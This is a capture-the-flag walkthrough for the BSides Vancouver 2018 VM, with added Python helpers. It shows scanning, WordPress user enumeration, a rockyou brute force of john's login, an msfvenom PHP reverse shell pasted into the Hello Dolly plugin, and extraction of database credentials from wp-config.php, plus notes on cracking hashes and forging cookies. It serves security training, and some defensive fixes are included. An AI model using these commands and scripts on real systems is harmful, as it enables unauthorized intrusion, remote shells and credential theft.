Tuesday, July 10, 2018

BSides Vancouver: 2018 (Workshop) Walkthrough (part 1)

You can find the VM and more information here.

Open the OVA file with VMware.

Nmap results (-Pn skips host discovery, -sS is a SYN scan, -sV grabs service versions, -sC runs the default NSE scripts)

nmap -Pn  -sV -sS -sC

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-10 10:32 +0530
Nmap scan report for
Host is up (0.00057s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x    2 65534    65534        4096 Mar 03 17:52 public
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry

|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:41:F5:CC (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP login: anonymous login is accepted (the ftp-anon script above confirms it), and the only thing exposed is the world-readable "public" directory, which is worth pulling down and reading before moving on to the web server.

Nikto results

nikto -host
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2018-07-10 09:54:27 (GMT5.5)
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 2140, size: 177, mtime: Sun Mar  4 00:47:59 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ Uncommon header 'link' found, with contents: </backup_wordpress/?rest_route=/>; rel="https://api.w.org/"
+ Entry '/backup_wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8347 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2018-07-10 09:54:40 (GMT5.5) (13 seconds)
+ 1 host(s) tested
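The Nikto findings above are all things a client can see in the first response. The following header audit is an added example (it is not the post's or Nikto's code): it takes a response header map, flags the missing security headers, decodes the Apache ETag into the inode and size Nikto reported, and names the Apache/PHP directive that fixes each item. SAMPLE_HEADERS is constructed from the values Nikto printed; the mtime part of the ETag is a placeholder, not a value captured from the box.

```python
"""Audit HTTP response headers for the leaks and gaps Nikto reported above.

Added example (not from the post, not Nikto's code). SAMPLE_HEADERS is
constructed from the values Nikto printed: Apache/2.2.22, PHP/5.3.10, the
'tcn: list' and 'link' headers, and an ETag built so that it decodes to
Nikto's inode 2140 / size 177. The ETag's mtime field is a made-up
placeholder, not captured from the box.
"""
import re

SAMPLE_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10-1ubuntu3.26",
    "ETag": '"85c-b1-566a0b8c3f6c0"',   # 0x85c = inode 2140, 0xb1 = size 177, mtime: placeholder
    "TCN": "list",
    "Link": '</backup_wordpress/?rest_route=/>; rel="https://api.w.org/"',
    "Content-Type": "text/html",
}

# Headers that should be present on every HTML response, with the fix to apply.
REQUIRED = {
    "X-Frame-Options": "clickjacking; add 'X-Frame-Options: SAMEORIGIN' (or CSP frame-ancestors)",
    "X-Content-Type-Options": "MIME sniffing; add 'X-Content-Type-Options: nosniff'",
}

HEX = re.compile(r"[0-9a-f]+")


def decode_apache_etag(etag):
    """Apache's default 'FileETag INode MTime Size' produces '"inode-size-mtime"' in hex.
    Returns (inode, size) as ints, or None when the value is not in that 3-part form
    (e.g. after switching to 'FileETag MTime Size', which yields two parts)."""
    value = etag.strip()
    if value.startswith("W/"):            # weak validator prefix
        value = value[2:]
    parts = value.strip('"').split("-")
    if len(parts) != 3 or not all(HEX.fullmatch(p) for p in parts):
        return None
    inode, size, _mtime = (int(p, 16) for p in parts)
    return inode, size


def audit_headers(headers):
    """Return one finding string per problem; an empty list means nothing flagged.
    Header names are compared case-insensitively, as HTTP requires."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, advice in REQUIRED.items():
        if name.lower() not in h:
            findings.append(f"missing {name}: {advice}")
    if re.search(r"/\d", h.get("server", "")):
        findings.append(f"Server reveals version '{h['server']}': set ServerTokens Prod")
    if "x-powered-by" in h:
        findings.append(f"X-Powered-By reveals '{h['x-powered-by']}': set expose_php = Off in php.ini")
    decoded = decode_apache_etag(h.get("etag", ""))
    if decoded:
        inode, size = decoded
        findings.append(f"ETag leaks inode {inode} and size {size}: set FileETag MTime Size")
    if h.get("tcn", "").lower() == "list":
        findings.append("TCN: list means MultiViews is on, so file names can be brute forced: set Options -MultiViews")
    if "rest_route=" in h.get("link", ""):
        findings.append(f"Link header reveals the WordPress REST root: {h['link']}")
    return findings


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print("+", finding)
```

Two notes on the output. The X-XSS-Protection header Nikto also flags is deprecated (the browser XSS auditor it controlled has been removed) and is deliberately not checked; a Content-Security-Policy is the current control. The Link header is the most useful line for the attacker: it gives away both the WordPress install path (/backup_wordpress/) and that the REST API is reachable, which is what the user enumeration below relies on.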

WPScan - user enumeration

 wpscan --url --enumerate u
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
<-- snip -->

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    | Id | Login | Name |
    | 1  | admin | admi |
    | 2  | john  | joh  |
[!] Default first WordPress username 'admin' is still used

[+] Finished: Tue Jul 10 10:10:11 2018
[+] Requests Done: 57
[+] Memory used: 64.051 MB
[+] Elapsed time: 00:00:05
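The two users come from the REST API root that Nikto's Link header pointed at: WordPress core answers ?rest_route=/wp/v2/users to anonymous clients with every user who has published a post. The following is an added example, not the post's or WPScan's code; SAMPLE_RESPONSE is a constructed JSON body matching the two users WPScan reported, and fetch_users() is the only part that touches the network (site URL is the caller's).

```python
"""Enumerate WordPress users from the /wp/v2/users REST endpoint.

Added example, not the post's or WPScan's code. SAMPLE_RESPONSE is
constructed to match the two users WPScan reported; the 'link' values are
illustrative. Only fetch_users() talks to a live site.
"""
import json
import sys
import urllib.request

SAMPLE_RESPONSE = json.dumps([
    {"id": 1, "name": "admi", "slug": "admin", "link": "http://target/backup_wordpress/?author=1"},
    {"id": 2, "name": "joh", "slug": "john", "link": "http://target/backup_wordpress/?author=2"},
])


def users_from_json(body):
    """Parse the /wp/v2/users JSON into (id, login guess, display name) tuples.
    'slug' is the user_nicename, which WordPress derives from the login at
    registration; it is the best unauthenticated guess for the login, not a
    guaranteed match (an administrator can change it afterwards)."""
    return [(int(e["id"]), e.get("slug", ""), e.get("name", "")) for e in json.loads(body)]


def users_url(site):
    """Use the rest_route query form: it works even when pretty permalinks
    (and therefore /wp-json/) are disabled. per_page=100 is the API maximum."""
    return site.rstrip("/") + "/?rest_route=/wp/v2/users&per_page=100"


def fetch_users(site, timeout=10):
    """Live query; returns [] when the endpoint is restricted (401) or not JSON."""
    req = urllib.request.Request(users_url(site), headers={"User-Agent": "rest-enum/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return users_from_json(resp.read().decode("utf-8", "replace"))
    except Exception:
        return []


def render(rows):
    """Same table layout WPScan prints."""
    lines = ["| Id | Login | Name |"]
    for uid, login, name in rows:
        lines.append(f"| {uid:<2} | {login:<5} | {name:<4} |")
    return "\n".join(lines)


if __name__ == "__main__":
    rows = fetch_users(sys.argv[1]) if len(sys.argv) > 1 else users_from_json(SAMPLE_RESPONSE)
    print(render(rows))
```

The defensive side: the endpoint can be closed to unauthenticated callers with a rest_authentication_errors or rest_endpoints filter in a small plugin, but the ?author=N archive redirect leaks the same slugs, so the real fix is to stop treating usernames as secret (unique, non-default logins plus a lockout or rate limit on wp-login.php). WPScan's warning that "admin" is still in use is the point: a default login halves the attacker's work.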

WPScan - password brute force against john with rockyou.txt

 wpscan --url --wordlist /home/sura/Research-and-Development/password-dump/rockyou.txt --username john
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

[+] URL:
[+] Started: Tue Jul 10 09:23:42 2018

<-- snip -->

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [!] ERROR: We received an unknown response for login: john and password: enigma            
^CBrute Forcing 'john' Time: 00:27:35 <              > (11312 / 2902428)  0.38%  ETA: ??:??:??
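WPScan 2.9.3 prints "unknown response" when wp-login.php answers with something it recognises neither as the normal failure page nor as a success; the scan was stopped by hand at that point. The classifier below is an added example (not WPScan's code) that makes the three outcomes explicit and shows how a wordlist loop should stop on anything other than a clean failure, so that a lockout or an odd page gets looked at instead of being skipped. The three responses are constructed to illustrate the cases, not captured traffic from the box.

```python
"""Classify a wp-login.php POST response and drive a wordlist with it.

Added example, not WPScan's code. FAILURE / SUCCESS / ODD are constructed
responses in the shape WordPress produces; they are not captured from the
target.
"""


def classify_login(status, headers, body):
    """status: int, headers: dict (names matched case-insensitively), body: str.
    Returns 'success', 'failure', 'blocked' or 'unknown'."""
    h = {k.lower(): v for k, v in headers.items()}
    cookies = h.get("set-cookie", "")
    if status == 302 and "wordpress_logged_in_" in cookies:
        return "success"       # auth cookie set, redirect to wp-admin
    if status == 200 and 'id="login_error"' in body:
        return "failure"       # the standard "ERROR: The password you entered..." page
    if status in (403, 429):
        return "blocked"       # lockout plugin / rate limit / WAF
    return "unknown"           # anything else, e.g. a 302 without the cookie


# Constructed responses (assumptions about shape, not captured traffic).
FAILURE = (200, {"Content-Type": "text/html"},
           '<div id="login_error"><strong>ERROR</strong>: The password you entered for the username john is incorrect.</div>')
SUCCESS = (302, {"Location": "http://target/backup_wordpress/wp-admin/",
                 "Set-Cookie": "wordpress_logged_in_0123=john%7C...; path=/backup_wordpress/; HttpOnly"}, "")
ODD = (302, {"Location": "http://target/backup_wordpress/"}, "")


def try_passwords(user, passwords, send):
    """Walk a wordlist with a caller-supplied send(user, pw) -> (status, headers, body).
    Stops at the first reply that is not a plain failure, returning (verdict, password),
    so a 'blocked' or 'unknown' reply is investigated rather than burning the list."""
    for pw in passwords:
        verdict = classify_login(*send(user, pw))
        if verdict != "failure":
            return verdict, pw
    return "exhausted", None


if __name__ == "__main__":
    def fake_send(user, pw):      # offline stand-in for the HTTP POST
        return SUCCESS if pw == "enigma" else FAILURE
    print(try_passwords("john", ["123456", "password", "enigma", "letmein"], fake_send))
```

Nikto did not report a lockout plugin and WPScan got a plain failure for 11,000 guesses, which is the real finding here: wp-login.php with no rate limiting and a default username is an offline-speed online attack.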

Log in to the site at /backup_wordpress/wp-login.php with the credentials found. The only candidate WPScan surfaced before the scan was interrupted is john:enigma; the "unknown response" is the login returning something other than the failure page WPScan expects, which is why that pair is the one to try. The plugin editor used in the next step needs an Administrator account, so john must hold that role.

Generate the payload with msfvenom

msfvenom -p php/reverse_php lhost= lport=4445 -f raw -e php/base64
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4021 (iteration=0)
php/base64 chosen with final size 4021
Payload size: 4021 bytes

Paste the payload into the Hello Dolly plugin's hello.php (Plugins > Editor), click Update File, then activate the plugin. Hello Dolly ships with every WordPress install, so it is always there to abuse, but this route needs the built-in file editor, which stays on unless DISALLOW_FILE_EDIT is defined as true in wp-config.php. The php/base64 encoder is only there to keep the PHP source free of quotes that the editor form might mangle; it adds no evasion.

PHP reverse shell: start a listener on the lport chosen above (4445) before activating the plugin, because the plugin code runs on the next page load once it is active. The shell runs inside the web server's PHP process, so it is www-data, not root, and the web root is the first thing to read.

Database credentials found in wp-config.php

cat /var/www/backup_wordpress/wp-config.php
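wp-config.php has to be readable by the web server user, so any web shell can read it; the define() lines carry the MySQL name, user, password and host, and the AUTH_KEY/SALT values that WordPress uses to sign login cookies. The parser below is an added example, not the post's code: it pulls every define() out of a wp-config.php, handling both quote styles and PHP's escape sequences, and returns the database credentials. SAMPLE_CONFIG is a constructed fragment in the shape WordPress ships; none of its values are from the target.

```python
"""Extract database credentials (and every other define) from wp-config.php.

Added example, not from the post. SAMPLE_CONFIG is constructed; its values
are not the target's. Run with a path argument to parse a real file.
"""
import re
import sys

SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define( 'DB_USER', "wpuser" );
define('DB_PASSWORD', 'p@ss;word\\'x');
define('DB_HOST', 'localhost');
$table_prefix = 'wp_';
define('AUTH_KEY', 'put your unique phrase here');
"""

# define( 'NAME' , 'value' ) with either quote style; group 4 is the raw PHP string.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])([A-Za-z_][A-Za-z0-9_]*)\1\s*,\s*(['"])((?:\\.|(?!\3).)*)\3\s*\)""",
    re.DOTALL,
)
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*(['"])(.*?)\1\s*;""")


def php_unescape(raw, quote):
    """Undo PHP string escapes. Single-quoted strings only escape \\' and \\\\;
    double-quoted strings also take \\n, \\t, \\$ and \\" (a minimal subset here)."""
    if quote == "'":
        return re.sub(r"\\(['\\])", r"\1", raw)
    table = {"n": "\n", "t": "\t", "\\": "\\", '"': '"', "$": "$"}
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(0)), raw, flags=re.DOTALL)


def parse_wp_config(text):
    """Return {CONSTANT: value} for every define() call in the file."""
    return {m.group(2): php_unescape(m.group(4), m.group(3)) for m in DEFINE_RE.finditer(text)}


def table_prefix(text):
    """The $table_prefix value, needed to find wp_users (default 'wp_')."""
    m = PREFIX_RE.search(text)
    return m.group(2) if m else "wp_"


def db_credentials(text):
    """Just the four values needed for a mysql client connection."""
    cfg = parse_wp_config(text)
    return {k: cfg.get(k) for k in ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")}


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    for key, value in db_credentials(text).items():
        print(f"{key:<12} {value}")
    print(f"table prefix {table_prefix(text)}")
```

With the credentials, the next step is a mysql client connection from the shell to read the <prefix>users table: the user_pass column holds phpass hashes ($P$...) that can be cracked offline, and the AUTH_KEY/SALT values let you forge a logged-in cookie without cracking anything. The install living under /var/www/backup_wordpress/ is itself a caveat worth checking: a directory named as a backup often has a wp-config.php.bak or a .zip next to it, and Apache serves those as plain text because PHP only handles .php.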